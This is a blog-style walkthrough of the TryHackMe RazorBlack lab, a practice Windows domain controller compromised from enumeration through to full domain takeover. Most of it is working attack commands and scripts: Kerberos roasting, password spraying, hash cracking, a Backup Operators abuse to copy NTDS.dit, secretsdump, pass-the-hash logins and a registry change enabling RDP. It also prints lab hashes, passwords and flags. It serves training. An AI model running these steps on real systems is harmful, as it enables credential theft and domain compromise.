RazorBlack TryHackMe Walkthrough

TL;DR Walkthrough of the TryHackMe RazorBlack, a general practice VM.

A full list of our TryHackMe walkthroughs and cheatsheets is here.

Background

The RazorBlack room was interesting and included a lot of various tactics in one VM, some of which I hadn’t used before.

• Enumerating when anonymous and guest access aren’t allowed
• Mounting a NFS share
• Building a list of potential usernames from a file containing first and last names
• Username enumeration with Kerbrute
• ASREPRoasting
• Password spraying, including using hashes that were teased out of a text file
• Resetting a password using Impacket
• Cracking a zip file’s password
• Working with PSCredential objects
• Kerberoasting
• Abusing Backup Operators to copy NTDS.dit & dump hashes offline
• Tweak the registry to allow RDP

It occurred to me that I should start all these TryHackMe walkthroughs with a hint, both to let everyone know what they need to know at a glance and because it might get them started on their own without even needing to read the rest of this.

Here’s the hint; everything you need to own this VM is in this query I ran after gaining access.

Admin note

The room was a bit annoying as I found out that the VM would become unavailable after one hour, regardless of what TryHackMe tells you in the ‘Active Machine Information’. I had to constantly terminate & restart the VM, hence an astute reader will notice that the target IP keeps changing in the notes & screenshots here. Just bear with me and remember that any IPs shown are the target VM’s. We didn’t use any reverse shells in this room.

Scanning & enumeration

As always we start out with an nmap scan for common services, versions, and OS:

sudo nmap -sV -O 10.10.64.68

We can be fairly certain that the VM is a DC for the raz0rblack.thm domain, however I was unable to enumerate a list of usernames given anonymous or guest access. It appears that the Guest account was left in it’s default, disabled state.

I scanned again, this time checking all ports:

sudo nmap -sV -O -p- 10.10.71.78

One then notices that the VM has the default NFS port open, 2049.

showmount -e 10.10.58.55

mkdir /home/kali/mnt

mkdir /home/kali/mnt/users

sudo mount -t nfs 10.10.58.55:/users /home/kali/mnt/users -o nolock

The first flag, Steven’s flag in the questions, is in the *.txt

THM{ab53e05c9a98def00314a14ccbfa8104}

I then copy/pasted the .xlsx file we found in the open NFS share to *.txt and ran it through Mishka’s username generator. We whipped up something in PowerShell that was quite useful:

#Input a text file with first name last names and generate potential usernames
$Names = Get-Content ".\THM stuff\THM Writeups\RazorBlack\Potential usernames.txt"
$FQDN = "@raz0rblack.thm"
"administrator" + "$FQDN" | Out-File .\Brute.txt -Append
"guest" + "$FQDN" | Out-File .\Brute.txt -Append

ForEach($Name in $Names)
{
$FirstName = $Name.Split('')[0]
$LastName = $Name.Split('')[1]
$FirstInitial = $FirstName.Substring(0,1)
$LastInitial = $LastName.Substring(0,1)

"$FirstName.$LastName" + "$FQDN" | Out-File .\Brute.txt -Append
"$FirstName$LastName" + "$FQDN" | Out-File .\Brute.txt -Append
"$FirstInitial$LastName" + "$FQDN" | Out-File .\Brute.txt -Append
"$FirstInitial-$LastName" + "$FQDN" | Out-File .\Brute.txt -Append
"$FirstInitial.$LastName" + "$FQDN" | Out-File .\Brute.txt -Append
}

$Results = (Get-Content .\Brute.txt).Length
Write-Host "Mishka generated $Results usernames."
Write-Host "Copy/paste the contents of Brute.txt to /home/kali/Downloads/Wordlists/Brute and kerbrute."

Just copy/paste the generated list of usernames, save it as a text file on the Kali VM, and feed it into Kerbrute. If I try a target later that also gives us middle initials then I can easily update the username generator as well.

Please note that normally one would not include the ‘@FQDN’ in the username list, however this particular THM VM was a bit flaky. Hence I did that just to be sure, and to practice putting two strings together in PowerShell.

cd /home/kali/Downloads/exploits

./kerbrute_linux_amd64 userenum -d raz0rblack.thm --dc 10.10.195.188 ../Wordlists/Brute.txt

Gaining initial access

Copy/paste the valid usernames into a text file and try ASREPRoasting. We have noticed that TryHackMe likes to include this since we can’t exactly phish a user to get initial access.

We saved any resulting hashes in a file and fed them to john.

cd /home/kali/Downloads/impacket-master/build/scripts-3.9

./GetNPUsers.py raz0rblack.thm/ -no-pass -usersfile /home/kali/Downloads/Wordlists/vuln2.txt

john --wordlist=/home/kali/Downloads/Wordlists/rockyou.txt /home/kali/Downloads/hashes/roasted2

Moving laterally

twilliams is merely a Domain User and doesn’t have much access to a DC, but we thought the VM’s creator had a sense of humor with the password ‘roastedpotatoes’ so we tried password spraying it against the list of valid usernames we enumerated earlier with kerbrute.

crackmapexec smb 10.10.248.12 -u /home/kali/Downloads/Wordlists/vuln2.txt -p roastpotatoes

./kerbrute_linux_amd64 passwordspray -d raz0rblack.thm --dc 10.10.248.12 /home/kali/Downloads/Wordlists/vuln2.txt 'roastpotatoes'

One will notice that kerbrute hits on sbradley but crackmapexec doesn’t.

Let’s see if that’s due to sbradley being required to change their password on next logon:

./smbpasswd.py sbradley@10.10.248.12

roastpotatoes

roastporatoes2 [put in twice to confirm]

Let’s run enum4linux as an authenticated user and see if we have access to any shares that might contain this zip file that TryHackMe is asking about next. Notice that we already have sbradley’s, aka Steven’s, flag from the NFS share and THM doesn’t ask for twilliams’ flag until the very end. This is a big hint.

enum4linux -u raz0rblack.thm\\sbradley -p roastpotatoes2 -a 10.10.248.12

cd /home/kali/Downloads/Pilfered

smbclient \\\\10.10.248.12\\trash -U raz0rblack.thm\\sbradley

get experiment_gone_wrong.zip

cd /home/kali/Downloads/Wordlists

fcrackzip -u -D -p rockyou.txt /home/kali/Downloads/Pilfered/RazorBlack/experiment_gone_wrong.zip

Fcrackzip quickly finds the password is electromagnetismo. Nice, we just answered THM’s question.

Notice the VM’s creator had a good sense of humor given the contents of the other text file:

sbradley> Hey Administrator our machine has the newly disclosed vulnerability for Windows Server 2019.
Administrator> What vulnerability??
sbradley> That new CVE-2020–1472 which is called ZeroLogon has released a new PoC.
Administrator> I have given you the last warning. If you exploit this on this Domain Controller as you did previously on our old Ubuntu server with dirtycow, I swear I will kill your WinRM-Access.
sbradley> Hey you won't believe what I am seeing.
Administrator> Now, don't say that you ran the exploit.
sbradley> Yeah, The exploit works great it needs nothing like credentials. Just give it IP and domain name and it resets the Administrator pass to an empty hash.
sbradley> I also used some tools to extract ntds. dit and SYSTEM.hive and transferred it into my box. I love running secretsdump.py on those files and dumped the hash.
Administrator> I am feeling like a new cron has been issued in my body named heart attack which will be executed within the next minute.
Administrator> But, Before I die I will kill your WinRM access……….
sbradley> I have made an encrypted zip containing the ntds.dit and the SYSTEM.hive and uploaded the zip inside the trash share.
sbradley> Hey Administrator are you there …
sbradley> Administrator …..

The administrator died after this incident.

Press F to pay respects

Moving laterally some more

There’s a system registry hive and a copy of NTDS.dit in that zip file, so let’s dump the hashes.

python3 /home/kali/Downloads/impacket-master/examples/secretsdump.py -ntds ntds.dit -system system.hive LOCAL >> hashes

Admittedly I got excited and immediately tried to evil-winrm into the VM using the Administrator’s hash. This of course failed, but there’s a couple hints here.

• THM is asking for ljudmila’s hash
• This username, nor lvetrova, is in the dump
• In fact the dump’s usernames are in a different format altogether

However bear in mind the human tendency for ‘password re-use’ and try throwing every NTLM hash at each of the valid usernames we already have for raz0rblack.thm.

We can tease out the hashes easily in PowerShell via:

#Input a secretsdump file and output just the NTLM hashes
$Lines = Get-Content "C:\Users\fdhsr\Google Drive\Documents\CompTIA studying\THM stuff\THM Writeups\RazorBlack\hashes2.txt"
ForEach($Line in $Lines)
{
$Line.Split(':')[3] | Out-File .\RawHashes.txt -Append
}

Copy/paste the hashes over to Kali and use crackmapexec:

crackmapexec smb 10.10.207.213 -u /home/kali/Downloads/Wordlists/vuln2.txt -H /home/kali/Downloads/Wordlists/RawHashes

Please note that this will take awhile, it’s throwing 1863 hashes at each username.

We get lucky and get a hit, which is also the answer to “What is Ljudmila’s Hash?”

raz0rblack.thm\lvetrova:f220d3988deb3f516c73f40ee16c431d

The questions guide us towards looking for a flag for this user next, so let’s connect to the DC via WinRM as them:

evil-winrm -i 10.10.207.213 -u lvetrova -H f220d3988deb3f516c73f40ee16c431d

Poking around a bit one will notice that that under C:\Users\lvetrova there is a PSCredential xml file. We can copy/paste the password value from the xml and read the password since we are logged on as the user. Others shouldn’t have this ability as this is PowerShell’s safe method of storing credentials.

$password = "01000000d08c9ddf0115d1118c7a00c04fc297eb010000009db56a0543f441469fc81aadb02945d20000000002000000000003660000c000000010000000069a026f82c590fa867556fe4495ca870000000004800000a0000000100000003b5bf64299ad06afde3fc9d6efe72d35500000002828ad79f53f3f38ceb3d8a8c41179a54dc94cab7b17ba52d0b9fc62dfd4a205f2bba2688e8e67e5cbc6d6584496d107b4307469b95eb3fdfd855abe27334a5fe32a8b35a3a0b6424081e14dc387902414000000e6e36273726b3c093bbbb4e976392a874772576d" | ConvertTo-SecureString

$cred = new-object system.management.automation.pscredential("lvetrova", $password)

$cred.getnetworkcredential() | Select-Object *

THM{694362e877adef0d85a92e6d17551fe4}

Remember this method for checking PSCredentials, we will see it again.

Escalating privileges

We went through the lateral movement above simply because THM’s questions led us that way. We could have Kerberoasted immediately after ASREPRoasting. All we need to Kerberoast is a Domain Users credentials.

python3 /home/kali/Downloads/impacket/build/scripts-3.9/GetUserSPNs.py -request raz0rblack.thm/twilliams -dc-ip 10.10.33.253 -outputfile /home/kali/Downloads/hashes/roasted3

john /home/kali/Downloads/hashes/roasted3 --format=krb5tgs --wordlist=/home/kali/Downloads/Wordlists/rockyou.txt

Note; I have two different Impacket builds on my Kali VM under impacket-master and impacket. The first one works for 99% of THM stuff, but for some weird reason it just refused to pull a ticket here.

This gets us the answer to the next question and another WinRM session as a new user. We will use the same PSCredential method as earlier to pull the flag for xyan1d3.

evil-winrm -i 10.10.30.130 -u xyan1d3 -p cyanide9amine5628

$password = "01000000d08c9ddf0115d1118c7a00c04fc297eb010000006bc3424112257a48aa7937963e14ed790000000002000000000003660000c000000010000000f098beb903e1a489eed98b779f3c70b80000000004800000a000000010000000e59705c44a560ce4c53e837d111bb39970000000feda9c94c6cd1687ffded5f438c59b080362e7e2fe0d9be8d2ab96ec7895303d167d5b38ce255ac6c01d7ac510ef662e48c53d3c89645053599c00d9e8a15598e8109d23a91a8663f886de1ba405806944f3f7e7df84091af0c73a4effac97ad05a3d6822cdeb06d4f415ba19587574f1400000051021e80fd5264d9730df52d2567cd7285726da2" | ConvertTo-SecureString

$cred = new-object system.management.automation.pscredential("xyan1d3", $password)

$cred.getnetworkcredential() | Select-Object *

LOL here it is -> THM{62ca7e0b901aa8f0b233cade0839b5bb}

Dumping hashes and owning the VM

At this point I realized that xyan1d3 is a member of the Backup Operators group. Quoting Microsoft’s description of this group from AD itself:

“Backup Operators can override security restrictions for the sole purpose of backing up or restoring files”

Guess what this means from a security standpoint; this group can read any file in Windows and can make copies of them. I asked CW6 Google and they immediately let me know how to abuse this. We can

• Backup the entire C: drive
• Make copies of NTDS.dit and the system registry hive from that backup
• Download them to Kali
• Dump all the domain hashes

At this point I was seeing the end goal of this exercise and I knew that the VM would stop working after 1 hour even if I hit ‘extend’ on THM’s site. Hence I was in a hurry, used some PowerShell aliases, and didn’t take screenshots. I’ll just put the commands I used here and bear in mind that one cannot run diskshadow.exe in interactive mode over WinRM. Hence we had to create a text file, upload it, and run it as a script.

Save this in backup.txt:

set verbose onX
set metadata C:\Windows\Temp\meta.cabX
set context clientaccessibleX
set context persistentX
begin backupX
add volume C: alias cdriveX
createX
expose %cdrive% E:X
end backup

Then on evil-winrm as xyan1d3:

mkdir C:\Temp

cd C:\Temp

upload /home/kali/Downloads/exploits/backup.txt

diskshadow /s backup.txt

#once that’s done:

robocopy /b E:\Windows\ntds . ntds.dit

reg save hklm\system c:\temp\system

download ntds.dit /home/kali/Downloads/Pilfered/RazorBlack/ntds.dit

download C:\Temp\system /home/kali/Downloads/Pilfered/RazorBlack/system

Then back on the Kali VM:

cd /home/kali/Downloads/Pilfered/RazorBlack

python3 /home/kali/Downloads/impacket-master/examples/secretsdump.py -ntds ntds.dit -system system LOCAL

Holy smokes, we have all the usernames and their hashes :D

Post Exploitation

Now it’s just a matter of finding the data to answer the remainder of THM’s questions. Let’s start with “What’s the root flag?”.

evil-winrm -i 10.10.155.148 -u Administrator -H 9689931bed40ca5a2ce1218210177f0c

cd ..\
cat root.xml

copy/paste the <SS N=”Password”> into https://www.duplichecker.com/hex-to-text.php and we get plaintext:

Damn you are a genius.
But, I apologize for cheating you like this.
Here is your Root Flag
THM{1b4f46cc4fba46348273d18dc91da20d}
Tag me on https://twitter.com/Xyan1d3 about what part you enjoyed on this box and what part you struggled with.
If you enjoyed this box you may also take a look at the linuxagency room in tryhackme.
Which contains some linux fundamentals and privilege escalation https://tryhackme.com/room/linuxagency.

If you have read much of our howtos here at test.local then you know that we like to get RDP access and then run PowerShell_ISE as Administrator. Hence that was the next thing we tried with this VM, only to hit this buzz kill.

We ran into this exact issue back in the Zerologon THM room, so I referenced my notes and ran:

New-ItemProperty -Path ‘HKLM:\System\CurrentControlSet\Control\Lsa’ -name ‘DisableRestrictedAdmin’ -PropertyType ‘DWORD’ -value ‘0’ -force

We can now RDP and answer the last two questions :P

Get-Content C:\Users\twilliams\defintely_definetely [just hit tab and Enter, this is why I LOVE PowerShell_ISE]

Get-ChildItem -Path "C:\" -Include "*secret*" -Recurse -ErrorAction SilentlyContinue

mspaint 'C:\Program Files\Top Secret\top_secret.png'

This gets us “Tyson’s flag”, aka twilliams : THM{5144f2c4107b7cab04916724e3749fb0}

Just in case not everyone gets the VM’s author’s joke, Google “howto quit vim” and you’ll know the last flag:

:wq

All done!

Summary

This was a really good practice VM. It was so good that I used a combination of my Kali VM and PowerShell_ISE on my host laptop. I normally only use Kali for TryHackMe and just save my notes on my laptop and subsequently on Google Drive. I referenced my notes from prior projects, learned a few new tricks from CW6 Google like how to abuse Backup Operators membership, and wrote a function in PowerShell to generate potential usernames.

Due to the wide variety of tactics used on this practice VM this turned into possibly our longest howto to date here at test.local.

It’s just too bad that TryHackMe kinda screwed up the implementation of the VM. It simply refused to run for more than 1 hour at a time.

We may also have to revisit our Auditing AD Series and do an annex on certain builtin groups like Backup Operators. We know a certain vendor who sells a 250k a year product that has never mentioned the rights held by this group.

References

Walkthrough: https://systemweakness.com/razorblack-tryhackme-lets-hack-active-directory-39ab552f5778

Mount NFS: https://resources.infosecinstitute.com/topics/penetration-testing/exploiting-nfs-share/

Split in PowerShell: https://devblogs.microsoft.com/scripting/powertip-get-first-140-characters-from-string-with-powershell/

kerbrute releases: https://github.com/ropnop/kerbrute/releases

password spray with crackmapexec: https://wadcoms.github.io/wadcoms/Crackmapexec-SMB-Password-Spray/

fcrackzip: https://www.kali.org/tools/fcrackzip/

secretsdump offline NTDS.dit: https://blog.ropnop.com/extracting-hashes-and-domain-info-from-ntds-dit/

Abuse Backup Operators to dump NTDS.dit: https://medium.com/r3d-buck3t/windows-privesc-with-sebackupprivilege-65d2cd1eb960

PTH with xfreerdp: https://www.kali.org/blog/passing-hash-remote-desktop/